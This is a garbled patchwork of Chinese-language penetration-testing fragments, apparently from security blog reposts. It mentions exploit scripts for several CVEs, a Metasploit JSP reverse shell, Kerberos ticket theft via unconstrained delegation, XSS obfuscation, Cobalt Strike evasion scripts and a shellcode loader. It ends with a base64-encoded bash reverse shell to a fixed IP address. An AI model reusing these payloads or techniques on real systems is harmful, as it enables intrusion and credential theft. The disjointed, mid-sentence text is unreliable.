格式保存的文档，详情请参阅：https://learn.microsoft.com/en-us/office/troubleshoot/settings/file-blocked-in-office

文章来源https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad觉得内容不错，就点下“赞”和“在看”如侵权请私聊公众号删文

免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。0x01

3.10.2.1确认漏洞nuclei扫描·CVE-2021-22005使用脚本https://github.com/shmilylty/cve-2021-22005-exp命令exp.exe

使用./Ortau此时Ortau监听在8091端口，判断发送至8091端口的请求UA中是否包含Ortau（默认配置，可修改），如果包含则转发至8092，如果不包含则转发至jd.com。0x02

Interceptor：可以自定义ajax的json返回值，前端测试用。Anti-HoneyPot：红队用，可以检查网页中的蜜罐链接并提示。ApiRequest.io

/Users/r1ng/Downloads/url.txt最终输出的效果如下：各类重点系统可直接进行筛选后按指定目标进行攻击获取权限，比如shiro：某OA：海康威视

查看本机所有票据通过以上命令获取票据,如果管理员访问了本机的一些服务，那么它的TGT就会被截获放入内存。我们模拟管理员调用非约束性委派机的smb服务我们回到非约束委派机，查看票据tgt被截获,我们用

';（2）生成foo数据库的phpMyAdmin的配置表，访问：plainhttp://10.1.1.10/chk_rel.php?fixall_pmadb=1&db=foo（3）篡改数据插入pma

文章来源：白帽子左一原文地址：https://github.com/yqcs/ZheTianZheTian强大的远程加载和执行ShellCode工具，免杀shellcode加载框架命令详解-u

.\pocs\20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py

shell.txt抓包将shell.txt上传到dockermsf开启监听，注意payload使用java/jsp_shell_reverse_tcp再使用poc反弹即可上线python

Cas一般是用来做身份认证的，所以有一定的攻击面，漏洞的成因是因为key的默认硬编码，导致可以通过反序列化配合Gadget使用。02影响版本

标签变得更加困难：来自字符代码如果没有任何形式的报价是允许你可以eval()一个fromCharCode在JavaScript创建任何XSS向量你需要：获取过去检查

2.0。使用方法在导入cna脚本之前，只需要修改当前路径$path为powershell_bypass.cna所在的真实路径即可。注意：均是两个斜杠选择Cobalt

/vulhub/dns/dns-zone-transfer//切换到具体类型的靶场目录6、切换目录，生成靶场docker-compose

{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNC4xMjkvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"